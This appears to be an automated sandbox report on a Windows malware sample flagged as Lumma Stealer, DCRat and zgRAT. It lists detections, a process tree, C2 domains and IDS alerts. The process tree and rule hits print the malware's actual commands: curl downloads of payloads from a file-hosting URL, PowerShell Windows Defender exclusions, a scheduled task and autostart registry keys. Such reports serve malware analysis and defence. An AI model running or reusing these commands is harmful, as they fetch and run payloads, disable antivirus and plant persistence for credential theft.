Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gh3zRWl4or.exe

Overview

General Information

Sample name:gh3zRWl4or.exe
renamed because original name is a hash value
Original sample name:77a592b9f5d0706eb93369d646deb8915303bdc725619c24378dfd3db1ca2ed2.exe
Analysis ID:1522823
MD5:b172feb05a0515d00442f6ef11b167bf
SHA1:7b68a6d3278644d6ffe8016b582141b67826eb96
SHA256:77a592b9f5d0706eb93369d646deb8915303bdc725619c24378dfd3db1ca2ed2
Tags:exezelensky-topuser-JAMESWT_MHT
Infos:

Detection

LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • gh3zRWl4or.exe (PID: 1476 cmdline: "C:\Users\user\Desktop\gh3zRWl4or.exe" MD5: B172FEB05A0515D00442F6EF11B167BF)
    • conhost.exe (PID: 3588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2520 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 6500 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • kdmapper.exe (PID: 5292 cmdline: "C:\Windows\Speech\kdmapper.exe" MD5: C85ABE0E8C3C4D4C5044AEF6422B8218)
      • wscript.exe (PID: 1836 cmdline: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 3232 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • msedge.exe (PID: 6632 cmdline: "C:\Edge/msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
            • csc.exe (PID: 3256 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 1928 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • csc.exe (PID: 2332 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 2500 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC9D2.tmp" "c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
                • Conhost.exe (PID: 3700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 4064 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7116 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WmiPrvSE.exe (PID: 5760 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • cmd.exe (PID: 5100 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 6436 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • PING.EXE (PID: 1352 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
              • msedge.exe (PID: 1504 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
    • cmd.exe (PID: 6972 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 5392 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • physmeme.exe (PID: 1196 cmdline: "C:\Windows\Speech\physmeme.exe" MD5: D6EDF37D68DA356237AE14270B3C7A1A)
      • conhost.exe (PID: 1792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 1512 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • schtasks.exe (PID: 1512 cmdline: schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 13 /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • LBUPSPkYsNXrxZEtdVzCng.exe (PID: 6780 cmdline: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • LBUPSPkYsNXrxZEtdVzCng.exe (PID: 2120 cmdline: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
    • cmd.exe (PID: 3700 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 3672 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 4196 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • LBUPSPkYsNXrxZEtdVzCng.exe (PID: 6492 cmdline: "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • msedge.exe (PID: 7120 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • msedge.exe (PID: 516 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • LBUPSPkYsNXrxZEtdVzCng.exe (PID: 1536 cmdline: "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • msedge.exe (PID: 2840 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • LBUPSPkYsNXrxZEtdVzCng.exe (PID: 2864 cmdline: "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • msedge.exe (PID: 6088 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
    • cmd.exe (PID: 2256 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5756 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 4184 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": ["tearrybyiwo.shop", "fossillargeiw.shop", "surveriysiop.shop", "captainynfanw.shop", "tiddymarktwo.shop", "strappystyio.shop", "appleboltelwk.shop", "coursedonnyre.shop", "tendencerangej.shop"], "Build id": "1AsNN2--5899070203"}
SourceRuleDescriptionAuthorStrings
C:\Edge\msedge.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\Edge\msedge.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Windows\Speech\kdmapper.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            00000006.00000003.1361668958.0000000005244000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000010.00000000.1521808737.0000000000B92000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000006.00000003.1359428900.0000000006A09000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000010.00000002.1584842315.0000000013039000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: msedge.exe PID: 6632JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Click to see the 2 entries
                      SourceRuleDescriptionAuthorStrings
                      16.0.msedge.exe.b90000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        16.0.msedge.exe.b90000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          6.3.kdmapper.exe.52926cf.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            6.3.kdmapper.exe.52926cf.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              6.3.kdmapper.exe.6a576cf.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                Click to see the 5 entries

                                System Summary

                                barindex
                                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 2332, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 6632, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', ProcessId: 4064, ProcessName: powershell.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 6632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LBUPSPkYsNXrxZEtdVzCng
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 6632, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 6632, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", ProcessId: 3256, ProcessName: csc.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 6632, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', ProcessId: 4064, ProcessName: powershell.exe
                                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 6632, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', ProcessId: 4064, ProcessName: powershell.exe
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\gh3zRWl4or.exe", ParentImage: C:\Users\user\Desktop\gh3zRWl4or.exe, ParentProcessId: 1476, ParentProcessName: gh3zRWl4or.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, ProcessId: 2520, ProcessName: cmd.exe
                                Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 3256, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP", ProcessId: 1928, ProcessName: cvtres.exe
                                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Speech\kdmapper.exe" , ParentImage: C:\Windows\Speech\kdmapper.exe, ParentProcessId: 5292, ParentProcessName: kdmapper.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , ProcessId: 1836, ProcessName: wscript.exe
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 6632, TargetFilename: C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 6632, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe', ProcessId: 4064, ProcessName: powershell.exe

                                Data Obfuscation

                                barindex
                                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 6632, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline", ProcessId: 3256, ProcessName: csc.exe
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:15.063865+020020560361Domain Observed Used for C2 Detected192.168.2.7631351.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:15.031016+020020560401Domain Observed Used for C2 Detected192.168.2.7520531.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:15.102262+020020560421Domain Observed Used for C2 Detected192.168.2.7582301.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:15.089811+020020560461Domain Observed Used for C2 Detected192.168.2.7604391.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:15.114119+020020560521Domain Observed Used for C2 Detected192.168.2.7509571.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:15.018204+020020560541Domain Observed Used for C2 Detected192.168.2.7597761.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:15.051876+020020560561Domain Observed Used for C2 Detected192.168.2.7612491.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:15.076598+020020560581Domain Observed Used for C2 Detected192.168.2.7594871.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:14.537928+020020561721Domain Observed Used for C2 Detected192.168.2.7494371.1.1.153UDP
                                2024-09-30T18:19:15.013492+020020561721Domain Observed Used for C2 Detected192.168.2.7652631.1.1.153TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: gh3zRWl4or.exeAvira: detected
